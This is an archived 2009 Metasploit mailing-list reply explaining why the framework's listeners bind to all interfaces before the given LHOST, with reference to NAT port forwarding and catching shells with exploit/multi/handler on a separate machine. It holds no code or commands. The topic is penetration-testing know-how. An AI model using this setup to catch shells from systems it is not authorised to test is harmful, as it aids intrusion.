Metasploit mailing list archives

Specify interface with browser_autopwn?

From: egypt at metasploit.com (egypt at metasploit.com)
Date: Mon, 10 Aug 2009 10:59:18 -0600

With all of its listeners, metasploit first tries to bind 0.0.0.0, the
'any' address which will work on all interfaces.  If that fails, it
will try the specific LHOST that you gave it.  The reason for trying
all interfaces first is the scenario when LHOST is a different IP from
the attack platform.  This will happen in the case of a NATing gateway
that forwards a particular port to your box, or when setting up
exploit/multi/handler to catch shells on a different machine from the
one sending exploits.

The local IP you're seeing there is determined after the bind happens.
 Since the listener bound to all interfaces, the local IP will appear
to be whichever one has a default gateway.

Hope this helped,
egypt